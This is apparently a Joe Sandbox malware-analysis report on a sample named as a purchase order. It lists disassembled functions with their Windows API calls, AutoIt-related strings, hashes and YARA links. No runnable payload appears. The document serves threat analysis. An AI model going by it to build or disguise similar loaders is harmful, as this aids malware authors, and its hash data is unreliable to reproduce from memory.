                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 946324512-2422070025
                          • Opcode ID: a76bece6d6795afbb1e53059c1f539fbe6ba9ccba91c449427ba7e3ae1b8e26d
                          • Instruction ID: 9a7932bec965eba47c25371b6465540cfba5750f039e635e42497b6309c6a6d4
                          • Opcode Fuzzy Hash: a76bece6d6795afbb1e53059c1f539fbe6ba9ccba91c449427ba7e3ae1b8e26d
                          • Instruction Fuzzy Hash: B031E735A04205DFCB10EF28C985EEA77E0EF14B28F248059E9168B3A2D775EE41E761
                          Function 00F93EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F93F40
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F93F54
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F93F78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: 4618ac394ddf11fe710c0cf0a3cd70a77ca34f04d728811f308b2ae10f9b51e5
                          • Instruction ID: a1a64de799fa80b1c56479db9ecaa9f53fb0dae98a7f88fa4d3cfbe310c835a6
                          • Opcode Fuzzy Hash: 4618ac394ddf11fe710c0cf0a3cd70a77ca34f04d728811f308b2ae10f9b51e5
                          • Instruction Fuzzy Hash: 0D219F33A00219BBEF259F50CC46FEA3B75EB48728F110215FA196B1D0D6B5A950AB90
                          Function 00F94653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F94705
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F94713
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F9471A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: e2e336248f22213538016a0c91e1b01020ce4faaf962d24b543191a886e110e2
                          • Instruction ID: d547907aa7a7cb7076b4fa4e0a47514ed20de325699d1d9912eeb836c03059e9
                          • Opcode Fuzzy Hash: e2e336248f22213538016a0c91e1b01020ce4faaf962d24b543191a886e110e2
                          • Instruction Fuzzy Hash: 172162B5600209AFEB10DF64DCD1DB737ADEB5A3A4B040059FA0097251DB30FC52EA61
                          Function 00F695AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 176396367-2734436370
                          • Opcode ID: 3acd49c11c3553d762b80b0daf12a6594d3a37d8fc950c92f74aba01c895261b
                          • Instruction ID: 20113358385800e8c92712c4f2db54d45c71529ec238411b2be21a3e5c79cd27
                          • Opcode Fuzzy Hash: 3acd49c11c3553d762b80b0daf12a6594d3a37d8fc950c92f74aba01c895261b
                          • Instruction Fuzzy Hash: 0B21087260872166D731AA24DC02FB773DCDF91320F54402AF94AD7181EBFAAD46F295
                          Function 00F937B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F93840
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F93850
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F93876
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: c853abdee2940065c3066801f0cdcf4ecb2e74cde38b146a4d8c475fc2e1abf9
                          • Instruction ID: cfe55cdfa6ac763a29e03e74eab9996a4ce88316292229a2279d85090da97577
                          • Opcode Fuzzy Hash: c853abdee2940065c3066801f0cdcf4ecb2e74cde38b146a4d8c475fc2e1abf9
                          • Instruction Fuzzy Hash: AA21C272A00218BBFF218F94CC45FBB376EEF89760F108114F9049B190C675DC52ABA0
                          Function 00F749F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F74A08
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F74A5C
                          • SetErrorMode.KERNEL32(00000000,?,?,00F9CC08), ref: 00F74AD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: %lu
                          • API String ID: 2507767853-685833217
                          • Opcode ID: 6a17d66936fa9e66c0a14f11d052db38cced9a01ef059da6fbcfe5c2fee5263c
                          • Instruction ID: 2c5c077c67dce81d970ece34ad1870cc53a0c3223ef778aed05b9c1e7032dd45
                          • Opcode Fuzzy Hash: 6a17d66936fa9e66c0a14f11d052db38cced9a01ef059da6fbcfe5c2fee5263c
                          • Instruction Fuzzy Hash: C4318275A00109AFDB10DF54C885EAA7BF8EF08318F1480A9F909DB352D775ED45EBA1
                          Function 00F941EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F9424F
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F94264
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F94271
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 6f6bcb338ef3ca7b68578461450b88c4e4ee3dfdc2ae5a35c6bf5e495b8086f8
                          • Instruction ID: 8de2b8e5b28ef5a530cb1fd83c8c95f326ebb5a12f0f1647ea7c11c42b5aa8d4
                          • Opcode Fuzzy Hash: 6f6bcb338ef3ca7b68578461450b88c4e4ee3dfdc2ae5a35c6bf5e495b8086f8
                          • Instruction Fuzzy Hash: B211E332640208BEFF205F29CC06FAB3BACEF95B64F110524FA55E2090D271E852AB20
                          Function 00F62F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                            • Part of subcall function 00F62DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F62DC5
                            • Part of subcall function 00F62DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F62DD6
                            • Part of subcall function 00F62DA7: GetCurrentThreadId.KERNEL32 ref: 00F62DDD
                            • Part of subcall function 00F62DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F62DE4
                          • GetFocus.USER32 ref: 00F62F78
                            • Part of subcall function 00F62DEE: GetParent.USER32(00000000), ref: 00F62DF9
                          • GetClassNameW.USER32(?,?,00000100), ref: 00F62FC3
                          • EnumChildWindows.USER32(?,00F6303B), ref: 00F62FEB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                          • String ID: %s%d
                          • API String ID: 1272988791-1110647743
                          • Opcode ID: eb5e9595042a457453b596e82566f4a437ef34e350a109211329ab37eb2d63c4
                          • Instruction ID: 074b492bd59ca36ac490fee690da7eb15ef0e38c2a4b96ef3a0e8d372dff32dc
                          • Opcode Fuzzy Hash: eb5e9595042a457453b596e82566f4a437ef34e350a109211329ab37eb2d63c4
                          • Instruction Fuzzy Hash: 9911AFB56002096BDF54BF70CC86FEE376AAF94304F044079B909DB292DE349949AB60
                          Function 00F95882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F958C1
                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F958EE
                          • DrawMenuBar.USER32(?), ref: 00F958FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw
                          • String ID: 0
                          • API String ID: 3227129158-4108050209
                          • Opcode ID: 1ef14a7edaa045c0f15cbbf34203c97a75ecea26d55982fb5f77a7cbe534a972
                          • Instruction ID: fbc80f5037d1d0d4192dfc9560d081d9e3c556b417487697e767c556f6503015
                          • Opcode Fuzzy Hash: 1ef14a7edaa045c0f15cbbf34203c97a75ecea26d55982fb5f77a7cbe534a972
                          • Instruction Fuzzy Hash: 91016131900218EFEF129F11DC44BAEBBB4FB45760F148099E849D6151DB308A88FF61
                          Function 00F5D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F5D3BF
                          • FreeLibrary.KERNEL32 ref: 00F5D3E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: GetSystemWow64DirectoryW$X64
                          • API String ID: 3013587201-2590602151
                          • Opcode ID: 4b64f8cbc63d468e98c2e8919e516524cea84f3aef91ed9ee868fb056e0d4d1d
                          • Instruction ID: b3bef9bd96a8ec347c3c9ab918fa3be4e5c6c5defa95feacc766578f999365c2
                          • Opcode Fuzzy Hash: 4b64f8cbc63d468e98c2e8919e516524cea84f3aef91ed9ee868fb056e0d4d1d
                          • Instruction Fuzzy Hash: 3CF0E522C07A219BD77153104C54BA93324AF11707F59816AEE02E2116D760CDCCBAD6
                          Function 00F6007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a045a83937a6cc8fa4e784f944a384ef83a0ba94b21839da093f2199104587f7
                          • Instruction ID: 39832b872592a4f95523debd9513f86c4e85b80f0e7c1b9b3d9a14548bbade7c
                          • Opcode Fuzzy Hash: a045a83937a6cc8fa4e784f944a384ef83a0ba94b21839da093f2199104587f7
                          • Instruction Fuzzy Hash: 0CC14B75A0020AEFDB14CFA8C894BAEB7B5FF48715F208598E505EB251DB31ED41EB90
                          Function 00F33E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                          • Instruction ID: 2f68e9fa4bf9014ad13e30320fe15098e092f562d9ae8e2b17ea5a38255b7af4
                          • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                          • Instruction Fuzzy Hash: C0A14972E007869FD71ADF28C8917AEBFF4EF61370F14416DE5959B281C238A981E750
                          Function 00F8342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearInitInitializeUninitialize
                          • String ID:
                          • API String ID: 1998397398-0
                          • Opcode ID: e5270b15c0586e7e3df3f5fe81f7da24c3ab105ad2caf1ca175c861847b3c137
                          • Instruction ID: fd89616d93f88fbc1f345ea8b8f65712e758b499d9ccf34ecf51b9c4fa73dfbe
                          • Opcode Fuzzy Hash: e5270b15c0586e7e3df3f5fe81f7da24c3ab105ad2caf1ca175c861847b3c137
                          • Instruction Fuzzy Hash: CCA14F756043019FC700EF28C885A6AB7E5FF88714F088859F9499B3A6DB34FE41EB91
                          Function 00F60436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F9FC08,?), ref: 00F605F0
                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F9FC08,?), ref: 00F60608
                          • CLSIDFromProgID.OLE32(?,?,00000000,00F9CC40,000000FF,?,00000000,00000800,00000000,?,00F9FC08,?), ref: 00F6062D
                          • _memcmp.LIBVCRUNTIME ref: 00F6064E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FromProg$FreeTask_memcmp
                          • String ID:
                          • API String ID: 314563124-0
                          • Opcode ID: 51660ddb3431116df5e9d89cd705aca5022a7f85994b56d1e13f7c6d68e5560e
                          • Instruction ID: dfb5d83ae9a5f614eff3d8749d05a9ceb13ce515e1451f492e42f2c22bc61eb0
                          • Opcode Fuzzy Hash: 51660ddb3431116df5e9d89cd705aca5022a7f85994b56d1e13f7c6d68e5560e
                          • Instruction Fuzzy Hash: 1D810975A00109EFCB04DF94C984EEEB7B9FF89315F244558E506AB250DB71AE06DF60
                          Function 00F41391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 7afab70d2620459fd7ed47ba8be265b2bfc37ce2d6ab84c3986227ab57d4ec88
                          • Instruction ID: 4642fac6dd9bb3cdfe6fe25fdb9c5e956a47653c1c9f8c76bd846ee8d5860dc2
                          • Opcode Fuzzy Hash: 7afab70d2620459fd7ed47ba8be265b2bfc37ce2d6ab84c3986227ab57d4ec88
                          • Instruction Fuzzy Hash: A441E536A00514ABDB21EBF9AC45AAE3EB4FF43770F144225FC19D61E2E77888C17661
                          Function 00F96278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(0124E720,?), ref: 00F962E2
                          • ScreenToClient.USER32(?,?), ref: 00F96315
                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00F96382
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: 3fad146a5cd97624422691c37e790b41be172d4ef47a5d02d1da8c2e7c3614f1
                          • Instruction ID: 0d57b327ac7291985d10b265d5f6fdf2877a3130216dd7190e37ca95b787b356
                          • Opcode Fuzzy Hash: 3fad146a5cd97624422691c37e790b41be172d4ef47a5d02d1da8c2e7c3614f1
                          • Instruction Fuzzy Hash: A8510A75A00209AFEF11DF68D990EAE7BB6FB45360F10815AF915DB290D730ED81EB90
                          Function 00F81AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00F81AFD
                          • WSAGetLastError.WSOCK32 ref: 00F81B0B
                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F81B8A
                          • WSAGetLastError.WSOCK32 ref: 00F81B94
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$socket
                          • String ID:
                          • API String ID: 1881357543-0
                          • Opcode ID: 5a0972e76c394a13025db4969511061d0e80563be83e24c5af55c62883711a9c
                          • Instruction ID: 735d79220452959bb970f68ea431f52c9a9193bfcaf20810590b0f05f96de25d
                          • Opcode Fuzzy Hash: 5a0972e76c394a13025db4969511061d0e80563be83e24c5af55c62883711a9c
                          • Instruction Fuzzy Hash: 7341D334600200AFE720AF24CC86F6577E5AB84718F548598F91A9F3D2D776ED82AB90
                          Function 00F3B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f62beb91ed06550f6a11e6133c1aa0d143a93a7fcd9e5cce05ea0963430df6fc
                          • Instruction ID: 673281d7ebcda15e28a50de8b2ab857380a9746daa4a53ba17aecbe69632431c
